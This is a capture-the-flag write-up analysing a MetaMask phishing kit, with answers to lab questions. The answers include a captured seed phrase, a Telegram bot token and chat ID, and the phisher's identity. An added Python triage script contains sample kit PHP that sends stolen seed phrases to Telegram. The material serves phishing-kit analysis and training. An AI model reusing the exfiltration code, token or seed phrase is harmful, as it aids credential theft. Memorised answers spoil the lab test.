GrabThePhisher WriteUp
1-) Which wallet is used for asking the seed phrase?
Inspect the index and note the metamask folder.
Go to the metamask directory and open metamask.php.
The wallet name is found there.
Answer => Metamask
2-) What is the file name that has the code for the phishing kit?
Answer => metamask.php
3-) In which language was the kit written?
Answer => php
4-) What service does the kit use to retrieve the victim’s machine information?
Answer => Sypex Geo
5-) How many seed phrases were already collected?
geo — city — date
Answer => 3
6-) How many seed phrases were already collected?
Answer => father also recycle embody balance concert mechanic believe owner pair muffin hockey
7-) Which medium had been used for credential dumping?
Answer => telegram
8-) What is the token for the channel?
Open metamask.php.
Answer => 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10
9-) What is the chat ID of the phisher’s channel?
Open metamask.php.
Answer => 5442785564
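The manual lookups in questions 8 and 9 can be scripted for kit triage. The following is an added example, not part of the original write-up or of the kit itself: a Python helper that pulls the Telegram bot token, chat ID and outbound hosts (such as the Sypex Geo lookup) out of a kit's PHP source. The sample PHP, its variable names, the token, the chat ID and the assumed token shape are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# PHP string assignments such as: $token = "value";
ASSIGN_RE = re.compile(r"""\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""")
# Bot token: literal in the URL, or a variable concatenated after "/bot".
BOT_RE = re.compile(r"""api\.telegram\.org/bot(?:(\d+:[\w-]{35})|['"]\s*\.\s*\$(\w+))""")
# chat_id: literal in the query string, or a concatenated variable.
CHAT_RE = re.compile(r"""chat_id=(?:(-?\d+)|['"]\s*\.\s*\$(\w+))""")
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")
# Assumed token shape: numeric bot id, colon, 35-character secret.
TOKEN_SHAPE = re.compile(r"\d{8,10}:[\w-]{35}")

def _resolve(match, strings):
    """Return the literal value, or the value of the referenced PHP variable."""
    if match is None:
        return None
    literal, var = match.groups()
    return literal or strings.get(var)

def triage_kit(php_source):
    """Extract Telegram exfiltration settings and outbound hosts from kit source."""
    strings = {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(php_source)}
    token = _resolve(BOT_RE.search(php_source), strings)
    hosts = {h for u in URL_RE.findall(php_source) if (h := urlparse(u).hostname)}
    return {
        "bot_token": token,
        "token_well_formed": bool(token and TOKEN_SHAPE.fullmatch(token)),
        "chat_id": _resolve(CHAT_RE.search(php_source), strings),
        "outbound_hosts": sorted(hosts),
    }

# Constructed placeholder values and constructed PHP, not taken from the real kit.
TOKEN = "1234567890:" + "A" * 35
SAMPLE_KIT = '''<?php
$geo = json_decode(file_get_contents("http://api.sypexgeo.net/json/" . $_SERVER["REMOTE_ADDR"]));
$token = "%s";
$id = "1000000001";
$text = "Seed: " . $_POST["data"] . " | " . $geo->city->name_en;
file_get_contents("https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $id . "&text=" . urlencode($text));
''' % TOKEN

if __name__ == "__main__":
    for key, value in triage_kit(SAMPLE_KIT).items():
        print(f"{key}: {value}")
```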
10-) What are the allies of the phish kit developer?
Open metamask.php.
Answer => j1j1b1s@m3r0
11-) What is the full name of the Phish Actor?
Query the Telegram channel.
Answer => Marcus Aurelius
12-) What is the username of the Phish Actor?
Query the Telegram channel.
Answer => pumpkinboii